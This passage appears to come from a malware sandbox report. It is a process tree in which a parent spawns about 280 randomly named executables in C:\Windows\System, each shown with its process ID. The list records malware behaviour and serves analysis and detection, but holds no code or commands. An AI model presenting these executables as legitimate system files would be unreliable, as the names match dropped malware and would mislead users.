- C:\Windows\System\YWGvWfA.exe
  C:\Windows\System\YWGvWfA.exe
  2⤵
  PID:7864
- C:\Windows\System\GWslkbj.exe
  C:\Windows\System\GWslkbj.exe
  2⤵
  PID:7880
- C:\Windows\System\KDrfUIb.exe
  C:\Windows\System\KDrfUIb.exe
  2⤵
  PID:7896
- C:\Windows\System\UcdASye.exe
  C:\Windows\System\UcdASye.exe
  2⤵
  PID:7912
- C:\Windows\System\LuphoLq.exe
  C:\Windows\System\LuphoLq.exe
  2⤵
  PID:7928
- C:\Windows\System\aDbtUjG.exe
  C:\Windows\System\aDbtUjG.exe
  2⤵
  PID:7944
- C:\Windows\System\wFnWZAV.exe
  C:\Windows\System\wFnWZAV.exe
  2⤵
  PID:7960
- C:\Windows\System\OoHixHp.exe
  C:\Windows\System\OoHixHp.exe
  2⤵
  PID:7976
- C:\Windows\System\aPzhymt.exe
  C:\Windows\System\aPzhymt.exe
  2⤵
  PID:7992
- C:\Windows\System\LPsNJOL.exe
  C:\Windows\System\LPsNJOL.exe
  2⤵
  PID:8008
- C:\Windows\System\PzPyhgu.exe
  C:\Windows\System\PzPyhgu.exe
  2⤵
  PID:8024
- C:\Windows\System\CprBTRd.exe
  C:\Windows\System\CprBTRd.exe
  2⤵
  PID:8040
- C:\Windows\System\DYBLVgf.exe
  C:\Windows\System\DYBLVgf.exe
  2⤵
  PID:8056
- C:\Windows\System\znYWEag.exe
  C:\Windows\System\znYWEag.exe
  2⤵
  PID:8072
- C:\Windows\System\MiRjTrY.exe
  C:\Windows\System\MiRjTrY.exe
  2⤵
  PID:8088
- C:\Windows\System\hSJAzlk.exe
  C:\Windows\System\hSJAzlk.exe
  2⤵
  PID:8104
- C:\Windows\System\VUgonsz.exe
  C:\Windows\System\VUgonsz.exe
  2⤵
  PID:8120
- C:\Windows\System\AUFSztA.exe
  C:\Windows\System\AUFSztA.exe
  2⤵
  PID:8136
- C:\Windows\System\dKVxwxj.exe
  C:\Windows\System\dKVxwxj.exe
  2⤵
  PID:8152
- C:\Windows\System\OzACOFS.exe
  C:\Windows\System\OzACOFS.exe
  2⤵
  PID:8168
- C:\Windows\System\twYaJQV.exe
  C:\Windows\System\twYaJQV.exe
  2⤵
  PID:8184
- C:\Windows\System\KhesdVU.exe
  C:\Windows\System\KhesdVU.exe
  2⤵
  PID:4552
- C:\Windows\System\XnKfzuf.exe
  C:\Windows\System\XnKfzuf.exe
  2⤵
  PID:6532
- C:\Windows\System\vmHlVqS.exe
  C:\Windows\System\vmHlVqS.exe
  2⤵
  PID:7224
- C:\Windows\System\SebFeUV.exe
  C:\Windows\System\SebFeUV.exe
  2⤵
  PID:7288
- C:\Windows\System\ziKUMOo.exe
  C:\Windows\System\ziKUMOo.exe
  2⤵
  PID:2396
- C:\Windows\System\ASwYefK.exe
  C:\Windows\System\ASwYefK.exe
  2⤵
  PID:7204
- C:\Windows\System\fMoOhVM.exe
  C:\Windows\System\fMoOhVM.exe
  2⤵
  PID:7268
- C:\Windows\System\lfnNacf.exe
  C:\Windows\System\lfnNacf.exe
  2⤵
  PID:7304
- C:\Windows\System\yEvCAWZ.exe
  C:\Windows\System\yEvCAWZ.exe
  2⤵
  PID:7440
- C:\Windows\System\SVgFNWU.exe
  C:\Windows\System\SVgFNWU.exe
  2⤵
  PID:7388
- C:\Windows\System\yWfpmXN.exe
  C:\Windows\System\yWfpmXN.exe
  2⤵
  PID:7420
- C:\Windows\System\IzsLcKY.exe
  C:\Windows\System\IzsLcKY.exe
  2⤵
  PID:7404
- C:\Windows\System\yzItGfw.exe
  C:\Windows\System\yzItGfw.exe
  2⤵
  PID:7484
- C:\Windows\System\aoSpuZz.exe
  C:\Windows\System\aoSpuZz.exe
  2⤵
  PID:7548
- C:\Windows\System\vSXNPxp.exe
  C:\Windows\System\vSXNPxp.exe
  2⤵
  PID:7612
- C:\Windows\System\NyxFFXX.exe
  C:\Windows\System\NyxFFXX.exe
  2⤵
  PID:7436
- C:\Windows\System\luclQpC.exe
  C:\Windows\System\luclQpC.exe
  2⤵
  PID:7532
- C:\Windows\System\qzNlEsg.exe
  C:\Windows\System\qzNlEsg.exe
  2⤵
  PID:7664
- C:\Windows\System\mszeEaq.exe
  C:\Windows\System\mszeEaq.exe
  2⤵
  PID:7632
- C:\Windows\System\OtztsmR.exe
  C:\Windows\System\OtztsmR.exe
  2⤵
  PID:7692
- C:\Windows\System\XArlFbi.exe
  C:\Windows\System\XArlFbi.exe
  2⤵
  PID:7740
- C:\Windows\System\MAtWXFk.exe
  C:\Windows\System\MAtWXFk.exe
  2⤵
  PID:7784
- C:\Windows\System\WOOhSVz.exe
  C:\Windows\System\WOOhSVz.exe
  2⤵
  PID:7824
- C:\Windows\System\sMpUOoZ.exe
  C:\Windows\System\sMpUOoZ.exe
  2⤵
  PID:7812
- C:\Windows\System\gwIrmBV.exe
  C:\Windows\System\gwIrmBV.exe
  2⤵
  PID:7832
- C:\Windows\System\MnQUtBt.exe
  C:\Windows\System\MnQUtBt.exe
  2⤵
  PID:7860
- C:\Windows\System\OSIhNEe.exe
  C:\Windows\System\OSIhNEe.exe
  2⤵
  PID:7904
- C:\Windows\System\wcDulDH.exe
  C:\Windows\System\wcDulDH.exe
  2⤵
  PID:7920
- C:\Windows\System\cFlyemc.exe
  C:\Windows\System\cFlyemc.exe
  2⤵
  PID:7956
- C:\Windows\System\bMTwSwp.exe
  C:\Windows\System\bMTwSwp.exe
  2⤵
  PID:8000
- C:\Windows\System\VKmnJGz.exe
  C:\Windows\System\VKmnJGz.exe
  2⤵
  PID:8036
- C:\Windows\System\gsmhSZE.exe
  C:\Windows\System\gsmhSZE.exe
  2⤵
  PID:8068
- C:\Windows\System\uqKPuZm.exe
  C:\Windows\System\uqKPuZm.exe
  2⤵
  PID:8096
- C:\Windows\System\vxhFFcJ.exe
  C:\Windows\System\vxhFFcJ.exe
  2⤵
  PID:8160
- C:\Windows\System\VtmEYLx.exe
  C:\Windows\System\VtmEYLx.exe
  2⤵
  PID:8148
- C:\Windows\System\rCKSCwH.exe
  C:\Windows\System\rCKSCwH.exe
  2⤵
  PID:8180
- C:\Windows\System\qXbYXnR.exe
  C:\Windows\System\qXbYXnR.exe
  2⤵
  PID:7256
- C:\Windows\System\UMuIVGD.exe
  C:\Windows\System\UMuIVGD.exe
  2⤵
  PID:7352
- C:\Windows\System\RNnoymB.exe
  C:\Windows\System\RNnoymB.exe
  2⤵
  PID:7516
- C:\Windows\System\pdGMGrr.exe
  C:\Windows\System\pdGMGrr.exe
  2⤵
  PID:7644
- C:\Windows\System\YSPBtCZ.exe
  C:\Windows\System\YSPBtCZ.exe
  2⤵
  PID:7648
- C:\Windows\System\MReGNbp.exe
  C:\Windows\System\MReGNbp.exe
  2⤵
  PID:7240
- C:\Windows\System\KboSlDd.exe
  C:\Windows\System\KboSlDd.exe
  2⤵
  PID:7768
- C:\Windows\System\vEhjLxt.exe
  C:\Windows\System\vEhjLxt.exe
  2⤵
  PID:5856
- C:\Windows\System\voYGHNJ.exe
  C:\Windows\System\voYGHNJ.exe
  2⤵
  PID:7628
- C:\Windows\System\MwdpmNK.exe
  C:\Windows\System\MwdpmNK.exe
  2⤵
  PID:7452
- C:\Windows\System\aSToTHH.exe
  C:\Windows\System\aSToTHH.exe
  2⤵
  PID:7580
- C:\Windows\System\raxtldI.exe
  C:\Windows\System\raxtldI.exe
  2⤵
  PID:7724
- C:\Windows\System\PBcZQYf.exe
  C:\Windows\System\PBcZQYf.exe
  2⤵
  PID:7876
- C:\Windows\System\AVfhsJd.exe
  C:\Windows\System\AVfhsJd.exe
  2⤵
  PID:7888
- C:\Windows\System\fgpuOGy.exe
  C:\Windows\System\fgpuOGy.exe
  2⤵
  PID:8020
- C:\Windows\System\VOKeomG.exe
  C:\Windows\System\VOKeomG.exe
  2⤵
  PID:8032
- C:\Windows\System\ZTbGGeS.exe
  C:\Windows\System\ZTbGGeS.exe
  2⤵
  PID:8164
- C:\Windows\System\PoNKCZj.exe
  C:\Windows\System\PoNKCZj.exe
  2⤵
  PID:7520
- C:\Windows\System\pnxJOyK.exe
  C:\Windows\System\pnxJOyK.exe
  2⤵
  PID:7416
- C:\Windows\System\jlINVaI.exe
  C:\Windows\System\jlINVaI.exe
  2⤵
  PID:6388
- C:\Windows\System\lThEKZs.exe
  C:\Windows\System\lThEKZs.exe
  2⤵
  PID:8144
- C:\Windows\System\IVtYMoU.exe
  C:\Windows\System\IVtYMoU.exe
  2⤵
  PID:7600
- C:\Windows\System\LyTOSTX.exe
  C:\Windows\System\LyTOSTX.exe
  2⤵
  PID:7384
- C:\Windows\System\AXTVSQv.exe
  C:\Windows\System\AXTVSQv.exe
  2⤵
  PID:7752
- C:\Windows\System\DQvxSiW.exe
  C:\Windows\System\DQvxSiW.exe
  2⤵
  PID:7792
- C:\Windows\System\NASszYO.exe
  C:\Windows\System\NASszYO.exe
  2⤵
  PID:7176
- C:\Windows\System\EWqjpcR.exe
  C:\Windows\System\EWqjpcR.exe
  2⤵
  PID:7984
- C:\Windows\System\uhZNesr.exe
  C:\Windows\System\uhZNesr.exe
  2⤵
  PID:8080
- C:\Windows\System\KVOIPPH.exe
  C:\Windows\System\KVOIPPH.exe
  2⤵
  PID:7764
- C:\Windows\System\NjFNjxQ.exe
  C:\Windows\System\NjFNjxQ.exe
  2⤵
  PID:8200
- C:\Windows\System\LKloAAV.exe
  C:\Windows\System\LKloAAV.exe
  2⤵
  PID:8216
- C:\Windows\System\hsPnPHZ.exe
  C:\Windows\System\hsPnPHZ.exe
  2⤵
  PID:8232
- C:\Windows\System\EFoHSFF.exe
  C:\Windows\System\EFoHSFF.exe
  2⤵
  PID:8248
- C:\Windows\System\sbIUOWD.exe
  C:\Windows\System\sbIUOWD.exe
  2⤵
  PID:8264
- C:\Windows\System\oqlSoLC.exe
  C:\Windows\System\oqlSoLC.exe
  2⤵
  PID:8280
- C:\Windows\System\HpgIzJF.exe
  C:\Windows\System\HpgIzJF.exe
  2⤵
  PID:8296
- C:\Windows\System\AMVuNVt.exe
  C:\Windows\System\AMVuNVt.exe
  2⤵
  PID:8312
- C:\Windows\System\znaxtmR.exe
  C:\Windows\System\znaxtmR.exe
  2⤵
  PID:8328
- C:\Windows\System\bNkcnBC.exe
  C:\Windows\System\bNkcnBC.exe
  2⤵
  PID:8344
- C:\Windows\System\Qhpinus.exe
  C:\Windows\System\Qhpinus.exe
  2⤵
  PID:8360
- C:\Windows\System\NHWTokV.exe
  C:\Windows\System\NHWTokV.exe
  2⤵
  PID:8380
- C:\Windows\System\mWwLbge.exe
  C:\Windows\System\mWwLbge.exe
  2⤵
  PID:8396
- C:\Windows\System\KkvNyDs.exe
  C:\Windows\System\KkvNyDs.exe
  2⤵
  PID:8412
- C:\Windows\System\wahDkGz.exe
  C:\Windows\System\wahDkGz.exe
  2⤵
  PID:8428
- C:\Windows\System\jpGZusd.exe
  C:\Windows\System\jpGZusd.exe
  2⤵
  PID:8444
- C:\Windows\System\ZWQKzZR.exe
  C:\Windows\System\ZWQKzZR.exe
  2⤵
  PID:8460
- C:\Windows\System\IuUWoXR.exe
  C:\Windows\System\IuUWoXR.exe
  2⤵
  PID:8476
- C:\Windows\System\PXSLaRy.exe
  C:\Windows\System\PXSLaRy.exe
  2⤵
  PID:8492
- C:\Windows\System\lkuwLUv.exe
  C:\Windows\System\lkuwLUv.exe
  2⤵
  PID:8512
- C:\Windows\System\XdksNfP.exe
  C:\Windows\System\XdksNfP.exe
  2⤵
  PID:8528
- C:\Windows\System\HWHGpCo.exe
  C:\Windows\System\HWHGpCo.exe
  2⤵
  PID:8544
- C:\Windows\System\XHPKdWS.exe
  C:\Windows\System\XHPKdWS.exe
  2⤵
  PID:8560
- C:\Windows\System\FoNKcAq.exe
  C:\Windows\System\FoNKcAq.exe
  2⤵
  PID:8576
- C:\Windows\System\FTeYEvU.exe
  C:\Windows\System\FTeYEvU.exe
  2⤵
  PID:8592
- C:\Windows\System\gXupCUD.exe
  C:\Windows\System\gXupCUD.exe
  2⤵
  PID:8608
- C:\Windows\System\MEURalO.exe
  C:\Windows\System\MEURalO.exe
  2⤵
  PID:8624
- C:\Windows\System\xXRhMpe.exe
  C:\Windows\System\xXRhMpe.exe
  2⤵
  PID:8640
- C:\Windows\System\FBGEzaY.exe
  C:\Windows\System\FBGEzaY.exe
  2⤵
  PID:8656
- C:\Windows\System\hulvPXt.exe
  C:\Windows\System\hulvPXt.exe
  2⤵
  PID:8672
- C:\Windows\System\llDrkVD.exe
  C:\Windows\System\llDrkVD.exe
  2⤵
  PID:8688
- C:\Windows\System\XKArTdX.exe
  C:\Windows\System\XKArTdX.exe
  2⤵
  PID:8704
- C:\Windows\System\QBTlhmY.exe
  C:\Windows\System\QBTlhmY.exe
  2⤵
  PID:8720
- C:\Windows\System\QXXbqVf.exe
  C:\Windows\System\QXXbqVf.exe
  2⤵
  PID:8736
- C:\Windows\System\BuqyjjA.exe
  C:\Windows\System\BuqyjjA.exe
  2⤵
  PID:8752
- C:\Windows\System\zOmRerk.exe
  C:\Windows\System\zOmRerk.exe
  2⤵
  PID:8768
- C:\Windows\System\ciWbqlO.exe
  C:\Windows\System\ciWbqlO.exe
  2⤵
  PID:8784
- C:\Windows\System\pSARiUH.exe
  C:\Windows\System\pSARiUH.exe
  2⤵
  PID:8800
- C:\Windows\System\dZWDZCR.exe
  C:\Windows\System\dZWDZCR.exe
  2⤵
  PID:8816
- C:\Windows\System\RAcuyoZ.exe
  C:\Windows\System\RAcuyoZ.exe
  2⤵
  PID:8832
- C:\Windows\System\LcetMFw.exe
  C:\Windows\System\LcetMFw.exe
  2⤵
  PID:8848
- C:\Windows\System\KWigDqL.exe
  C:\Windows\System\KWigDqL.exe
  2⤵
  PID:8868
- C:\Windows\System\sfcVwHE.exe
  C:\Windows\System\sfcVwHE.exe
  2⤵
  PID:8884
- C:\Windows\System\sPZFMMN.exe
  C:\Windows\System\sPZFMMN.exe
  2⤵
  PID:8900
- C:\Windows\System\GolEWnk.exe
  C:\Windows\System\GolEWnk.exe
  2⤵
  PID:8916
- C:\Windows\System\TtjXhrJ.exe
  C:\Windows\System\TtjXhrJ.exe
  2⤵
  PID:8932
- C:\Windows\System\SmGBtoV.exe
  C:\Windows\System\SmGBtoV.exe
  2⤵
  PID:8948
- C:\Windows\System\mpgIYMo.exe
  C:\Windows\System\mpgIYMo.exe
  2⤵
  PID:8964
- C:\Windows\System\FXKnDmn.exe
  C:\Windows\System\FXKnDmn.exe
  2⤵
  PID:8980
- C:\Windows\System\DAcqlax.exe
  C:\Windows\System\DAcqlax.exe
  2⤵
  PID:8996
- C:\Windows\System\tOdSPas.exe
  C:\Windows\System\tOdSPas.exe
  2⤵
  PID:9016
- C:\Windows\System\vPzMhgJ.exe
  C:\Windows\System\vPzMhgJ.exe
  2⤵
  PID:9032
- C:\Windows\System\qgpzNbY.exe
  C:\Windows\System\qgpzNbY.exe
  2⤵
  PID:9048
- C:\Windows\System\ZvdcNbA.exe
  C:\Windows\System\ZvdcNbA.exe
  2⤵
  PID:9064
- C:\Windows\System\clInUXk.exe
  C:\Windows\System\clInUXk.exe
  2⤵
  PID:9080
- C:\Windows\System\UqVxEdW.exe
  C:\Windows\System\UqVxEdW.exe
  2⤵
  PID:9096
- C:\Windows\System\qhdYNbK.exe
  C:\Windows\System\qhdYNbK.exe
  2⤵
  PID:9112
- C:\Windows\System\xTNUIMB.exe
  C:\Windows\System\xTNUIMB.exe
  2⤵
  PID:9128
- C:\Windows\System\YIusOEs.exe
  C:\Windows\System\YIusOEs.exe
  2⤵
  PID:9144
- C:\Windows\System\iQLUDAE.exe
  C:\Windows\System\iQLUDAE.exe
  2⤵
  PID:9160
- C:\Windows\System\iuwEXZh.exe
  C:\Windows\System\iuwEXZh.exe
  2⤵
  PID:9176
- C:\Windows\System\cXCXBCy.exe
  C:\Windows\System\cXCXBCy.exe
  2⤵
  PID:9192
- C:\Windows\System\emfOidw.exe
  C:\Windows\System\emfOidw.exe
  2⤵
  PID:9208
- C:\Windows\System\VKWnxyP.exe
  C:\Windows\System\VKWnxyP.exe
  2⤵
  PID:8212
- C:\Windows\System\NJDffqr.exe
  C:\Windows\System\NJDffqr.exe
  2⤵
  PID:7372
- C:\Windows\System\wqRPKtb.exe
  C:\Windows\System\wqRPKtb.exe
  2⤵
  PID:7316
- C:\Windows\System\GjzgMmW.exe
  C:\Windows\System\GjzgMmW.exe
  2⤵
  PID:7852
- C:\Windows\System\lszGSOi.exe
  C:\Windows\System\lszGSOi.exe
  2⤵
  PID:8224
- C:\Windows\System\AVElAuA.exe
  C:\Windows\System\AVElAuA.exe
  2⤵
  PID:8288
- C:\Windows\System\fqwgEZF.exe
  C:\Windows\System\fqwgEZF.exe
  2⤵
  PID:8352
- C:\Windows\System\mDjzKDW.exe
  C:\Windows\System\mDjzKDW.exe
  2⤵
  PID:8336
- C:\Windows\System\osOQqXW.exe
  C:\Windows\System\osOQqXW.exe
  2⤵
  PID:8340
- C:\Windows\System\fLXfCSj.exe
  C:\Windows\System\fLXfCSj.exe
  2⤵
  PID:8408
- C:\Windows\System\shiQDNp.exe
  C:\Windows\System\shiQDNp.exe
  2⤵
  PID:8468
- C:\Windows\System\iVqwLpV.exe
  C:\Windows\System\iVqwLpV.exe
  2⤵
  PID:8500
- C:\Windows\System\sLKiTul.exe
  C:\Windows\System\sLKiTul.exe
  2⤵
  PID:8488
- C:\Windows\System\OwGOOhr.exe
  C:\Windows\System\OwGOOhr.exe
  2⤵
  PID:8568
- C:\Windows\System\sVVISaR.exe
  C:\Windows\System\sVVISaR.exe
  2⤵
  PID:8604
- C:\Windows\System\MSLuozO.exe
  C:\Windows\System\MSLuozO.exe
  2⤵
  PID:8520
- C:\Windows\System\jSgiIeV.exe
  C:\Windows\System\jSgiIeV.exe
  2⤵
  PID:8700
- C:\Windows\System\xmDFuOv.exe
  C:\Windows\System\xmDFuOv.exe
  2⤵
  PID:8760
- C:\Windows\System\PEGGqSI.exe
  C:\Windows\System\PEGGqSI.exe
  2⤵
  PID:8584
- C:\Windows\System\PjgMNxg.exe
  C:\Windows\System\PjgMNxg.exe
  2⤵
  PID:8620
- C:\Windows\System\rXXUHqj.exe
  C:\Windows\System\rXXUHqj.exe
  2⤵
  PID:8824
- C:\Windows\System\jRcPlON.exe
  C:\Windows\System\jRcPlON.exe
  2⤵
  PID:8896
- C:\Windows\System\DJIPIyS.exe
  C:\Windows\System\DJIPIyS.exe
  2⤵
  PID:8684
- C:\Windows\System\aVeQGdZ.exe
  C:\Windows\System\aVeQGdZ.exe
  2⤵
  PID:8960
- C:\Windows\System\ghtQWPQ.exe
  C:\Windows\System\ghtQWPQ.exe
  2⤵
  PID:8776
- C:\Windows\System\xEnDnIM.exe
  C:\Windows\System\xEnDnIM.exe
  2⤵
  PID:8840
- C:\Windows\System\eTBpshi.exe
  C:\Windows\System\eTBpshi.exe
  2⤵
  PID:8748
- C:\Windows\System\leMwIGN.exe
  C:\Windows\System\leMwIGN.exe
  2⤵
  PID:8908
- C:\Windows\System\fZDxoSX.exe
  C:\Windows\System\fZDxoSX.exe
  2⤵
  PID:8972
- C:\Windows\System\zxDwPlS.exe
  C:\Windows\System\zxDwPlS.exe
  2⤵
  PID:9044
- C:\Windows\System\iYHvUPU.exe
  C:\Windows\System\iYHvUPU.exe
  2⤵
  PID:9060
- C:\Windows\System\GhySMTy.exe
  C:\Windows\System\GhySMTy.exe
  2⤵
  PID:9124
- C:\Windows\System\PgRRvdO.exe
  C:\Windows\System\PgRRvdO.exe
  2⤵
  PID:9188
- C:\Windows\System\bKYYpTX.exe
  C:\Windows\System\bKYYpTX.exe
  2⤵
  PID:7456
- C:\Windows\System\CdtircZ.exe
  C:\Windows\System\CdtircZ.exe
  2⤵
  PID:8304
- C:\Windows\System\BkNphFB.exe
  C:\Windows\System\BkNphFB.exe
  2⤵
  PID:9168
- C:\Windows\System\QxRbsJe.exe
  C:\Windows\System\QxRbsJe.exe
  2⤵
  PID:8484
- C:\Windows\System\NjjWBaI.exe
  C:\Windows\System\NjjWBaI.exe
  2⤵
  PID:8240
- C:\Windows\System\vNrFOtX.exe
  C:\Windows\System\vNrFOtX.exe
  2⤵
  PID:7940
- C:\Windows\System\WpTSDwx.exe
  C:\Windows\System\WpTSDwx.exe
  2⤵
  PID:8256
- C:\Windows\System\NslBvCn.exe
  C:\Windows\System\NslBvCn.exe
  2⤵
  PID:8376
- C:\Windows\System\AEFDTmw.exe
  C:\Windows\System\AEFDTmw.exe
  2⤵
  PID:8388
- C:\Windows\System\vREmLTw.exe
  C:\Windows\System\vREmLTw.exe
  2⤵
  PID:9140
- C:\Windows\System\PsCWuRA.exe
  C:\Windows\System\PsCWuRA.exe
  2⤵
  PID:8664
- C:\Windows\System\CoMsKiZ.exe
  C:\Windows\System\CoMsKiZ.exe
  2⤵
  PID:8892
- C:\Windows\System\pASvsTR.exe
  C:\Windows\System\pASvsTR.exe
  2⤵
  PID:8928
- C:\Windows\System\dbjdLXJ.exe
  C:\Windows\System\dbjdLXJ.exe
  2⤵
  PID:2712
- C:\Windows\System\OBEirGe.exe
  C:\Windows\System\OBEirGe.exe
  2⤵
  PID:8744
- C:\Windows\System\frbVxdL.exe
  C:\Windows\System\frbVxdL.exe
  2⤵
  PID:8944
- C:\Windows\System\tbEDfXl.exe
  C:\Windows\System\tbEDfXl.exe
  2⤵
  PID:8880
- C:\Windows\System\EgArnTL.exe
  C:\Windows\System\EgArnTL.exe
  2⤵
  PID:9120
- C:\Windows\System\kZOIRRa.exe
  C:\Windows\System\kZOIRRa.exe
  2⤵
  PID:8420
- C:\Windows\System\lWwaFbn.exe
  C:\Windows\System\lWwaFbn.exe
  2⤵
  PID:8552
- C:\Windows\System\KwdItbr.exe
  C:\Windows\System\KwdItbr.exe
  2⤵
  PID:8636
- C:\Windows\System\QwxmEDW.exe
  C:\Windows\System\QwxmEDW.exe
  2⤵
  PID:9108
- C:\Windows\System\lJRSwAb.exe
  C:\Windows\System\lJRSwAb.exe
  2⤵
  PID:9028
- C:\Windows\System\WKhIqUF.exe
  C:\Windows\System\WKhIqUF.exe
  2⤵
  PID:8764
- C:\Windows\System\OjXCCas.exe
  C:\Windows\System\OjXCCas.exe
  2⤵
  PID:8324
- C:\Windows\System\GvlaweS.exe
  C:\Windows\System\GvlaweS.exe
  2⤵
  PID:8600
- C:\Windows\System\rOXFRnG.exe
  C:\Windows\System\rOXFRnG.exe
  2⤵
  PID:8828
- C:\Windows\System\eYXYWcQ.exe
  C:\Windows\System\eYXYWcQ.exe
  2⤵
  PID:8796
- C:\Windows\System\CgbAyfD.exe
  C:\Windows\System\CgbAyfD.exe
  2⤵
  PID:9092
- C:\Windows\System\GKemFIX.exe
  C:\Windows\System\GKemFIX.exe
  2⤵
  PID:8128
- C:\Windows\System\LOnnzsM.exe
  C:\Windows\System\LOnnzsM.exe
  2⤵
  PID:9156
- C:\Windows\System\KBIVwcE.exe
  C:\Windows\System\KBIVwcE.exe
  2⤵
  PID:8276
- C:\Windows\System\bxzHwor.exe
  C:\Windows\System\bxzHwor.exe
  2⤵
  PID:8616
- C:\Windows\System\QalbuDI.exe
  C:\Windows\System\QalbuDI.exe
  2⤵
  PID:8556
- C:\Windows\System\hklAewI.exe
  C:\Windows\System\hklAewI.exe
  2⤵
  PID:8792
- C:\Windows\System\mGYTIRp.exe
  C:\Windows\System\mGYTIRp.exe
  2⤵
  PID:9220
- C:\Windows\System\dGOWJnr.exe
  C:\Windows\System\dGOWJnr.exe
  2⤵
  PID:9236
- C:\Windows\System\dIjdlSN.exe
  C:\Windows\System\dIjdlSN.exe
  2⤵
  PID:9252
- C:\Windows\System\tNCryTG.exe
  C:\Windows\System\tNCryTG.exe
  2⤵
  PID:9268
- C:\Windows\System\nrStHhI.exe
  C:\Windows\System\nrStHhI.exe
  2⤵
  PID:9284
- C:\Windows\System\FUsRvRl.exe
  C:\Windows\System\FUsRvRl.exe
  2⤵
  PID:9300
- C:\Windows\System\hfddcHU.exe
  C:\Windows\System\hfddcHU.exe
  2⤵
  PID:9316
- C:\Windows\System\GXpEuNg.exe
  C:\Windows\System\GXpEuNg.exe
  2⤵
  PID:9332
- C:\Windows\System\APXZNqI.exe
  C:\Windows\System\APXZNqI.exe
  2⤵
  PID:9348
- C:\Windows\System\uSmKEcs.exe
  C:\Windows\System\uSmKEcs.exe
  2⤵
  PID:9364
- C:\Windows\System\cXGNWzf.exe
  C:\Windows\System\cXGNWzf.exe
  2⤵
  PID:9380
- C:\Windows\System\gFNFvZg.exe
  C:\Windows\System\gFNFvZg.exe
  2⤵
  PID:9396
- C:\Windows\System\ikwTDAT.exe
  C:\Windows\System\ikwTDAT.exe
  2⤵
  PID:9412
- C:\Windows\System\kFcadOW.exe
  C:\Windows\System\kFcadOW.exe
  2⤵
  PID:9428
- C:\Windows\System\Whpbbey.exe
  C:\Windows\System\Whpbbey.exe
  2⤵
  PID:9444
- C:\Windows\System\VcVcLQD.exe
  C:\Windows\System\VcVcLQD.exe
  2⤵
  PID:9460
- C:\Windows\System\lzgBMaf.exe
  C:\Windows\System\lzgBMaf.exe
  2⤵
  PID:9476
- C:\Windows\System\OtRWWzm.exe
  C:\Windows\System\OtRWWzm.exe
  2⤵
  PID:9492
- C:\Windows\System\dtfpjCJ.exe
  C:\Windows\System\dtfpjCJ.exe
  2⤵
  PID:9508
- C:\Windows\System\hymjVZg.exe
  C:\Windows\System\hymjVZg.exe
  2⤵
  PID:9524
- C:\Windows\System\cgUgkmH.exe
  C:\Windows\System\cgUgkmH.exe
  2⤵
  PID:9540
- C:\Windows\System\mDTpixx.exe
  C:\Windows\System\mDTpixx.exe
  2⤵
  PID:9556
- C:\Windows\System\nbFaZch.exe
  C:\Windows\System\nbFaZch.exe
  2⤵
  PID:9572
- C:\Windows\System\txvNCYa.exe
  C:\Windows\System\txvNCYa.exe
  2⤵
  PID:9588
- C:\Windows\System\MqSFWQP.exe
  C:\Windows\System\MqSFWQP.exe
  2⤵
  PID:9604
- C:\Windows\System\yIlphqE.exe
  C:\Windows\System\yIlphqE.exe
  2⤵
  PID:9620
- C:\Windows\System\VsUEufc.exe
  C:\Windows\System\VsUEufc.exe
  2⤵
  PID:9636
- C:\Windows\System\mdCFqzg.exe
  C:\Windows\System\mdCFqzg.exe
  2⤵
  PID:9652
- C:\Windows\System\VEhygtS.exe
  C:\Windows\System\VEhygtS.exe
  2⤵
  PID:9668
- C:\Windows\System\swwZatk.exe
  C:\Windows\System\swwZatk.exe
  2⤵
  PID:9684
- C:\Windows\System\JyciyZO.exe
  C:\Windows\System\JyciyZO.exe
  2⤵
  PID:9700
- C:\Windows\System\DnnSqHQ.exe
  C:\Windows\System\DnnSqHQ.exe
  2⤵
  PID:9716
- C:\Windows\System\lHWKftD.exe
  C:\Windows\System\lHWKftD.exe
  2⤵
  PID:9732
- C:\Windows\System\xwdCGhN.exe
  C:\Windows\System\xwdCGhN.exe
  2⤵
  PID:9748
- C:\Windows\System\EtVoLOf.exe
  C:\Windows\System\EtVoLOf.exe
  2⤵
  PID:9764
- C:\Windows\System\rMdrrDw.exe
  C:\Windows\System\rMdrrDw.exe
  2⤵
  PID:9780
- C:\Windows\System\ipBfoEd.exe
  C:\Windows\System\ipBfoEd.exe
  2⤵
  PID:9796
- C:\Windows\System\OuzYbnu.exe
  C:\Windows\System\OuzYbnu.exe
  2⤵
  PID:9812
- C:\Windows\System\sQrtRZB.exe
  C:\Windows\System\sQrtRZB.exe
  2⤵
  PID:9828
- C:\Windows\System\IeDigKt.exe
  C:\Windows\System\IeDigKt.exe
  2⤵
  PID:9844
- C:\Windows\System\XKLDnEU.exe
  C:\Windows\System\XKLDnEU.exe
  2⤵
  PID:9860
- C:\Windows\System\HTUPlIR.exe
  C:\Windows\System\HTUPlIR.exe
  2⤵
  PID:9876
- C:\Windows\System\OtSOpPN.exe
  C:\Windows\System\OtSOpPN.exe
  2⤵
  PID:9892
- C:\Windows\System\KQbIidF.exe
  C:\Windows\System\KQbIidF.exe
  2⤵
  PID:9908
- C:\Windows\System\nWIAtYb.exe
  C:\Windows\System\nWIAtYb.exe
  2⤵
  PID:9924
- C:\Windows\System\zclGyDB.exe
  C:\Windows\System\zclGyDB.exe
  2⤵
  PID:9940
- C:\Windows\System\AEOkSfJ.exe
  C:\Windows\System\AEOkSfJ.exe
  2⤵
  PID:9956
- C:\Windows\System\NVvskMe.exe
  C:\Windows\System\NVvskMe.exe
  2⤵
  PID:9972
- C:\Windows\System\DVPlEkk.exe
  C:\Windows\System\DVPlEkk.exe
  2⤵
  PID:9988
- C:\Windows\System\BkHWcVq.exe
  C:\Windows\System\BkHWcVq.exe
  2⤵
  PID:10004
- C:\Windows\System\BntKfLK.exe
  C:\Windows\System\BntKfLK.exe
  2⤵
  PID:10020
- C:\Windows\System\uUDtKAt.exe
  C:\Windows\System\uUDtKAt.exe
  2⤵
  PID:10036
- C:\Windows\System\WLfpZiw.exe
  C:\Windows\System\WLfpZiw.exe
  2⤵
  PID:10052
- C:\Windows\System\AbxwLFc.exe
  C:\Windows\System\AbxwLFc.exe
  2⤵
  PID:10068
- C:\Windows\System\oGytpSy.exe
  C:\Windows\System\oGytpSy.exe
  2⤵
  PID:10084
- C:\Windows\System\kakiRbt.exe
  C:\Windows\System\kakiRbt.exe
  2⤵
  PID:10100
- C:\Windows\System\ZfZRUFU.exe
  C:\Windows\System\ZfZRUFU.exe
  2⤵
  PID:10116
- C:\Windows\System\SBEWPTY.exe
  C:\Windows\System\SBEWPTY.exe
  2⤵
  PID:10132
- C:\Windows\System\TChLxiK.exe
  C:\Windows\System\TChLxiK.exe
  2⤵
  PID:10148
